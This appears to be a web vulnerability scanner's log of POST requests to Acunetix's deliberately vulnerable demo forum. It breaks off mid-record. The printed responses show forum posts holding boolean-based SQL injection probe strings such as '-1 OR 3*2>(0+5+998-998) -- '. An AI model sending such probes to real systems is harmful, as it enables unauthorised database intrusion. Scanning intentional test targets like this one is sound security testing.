</tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:42 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=61 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3073 |
Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum @@NiQ6e </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/@@NiQ6e </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>@@NiQ6e - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=62 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:49 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=63 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=64 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3087 |
Response Body - size: 3,087 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=65 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3087 |
Response Body - size: 3,087 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:16 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=66 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3085 |
Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+998-998) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=67 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3085 |
Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+998-998) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=68 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3083 |
Response Body - size: 3,083 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 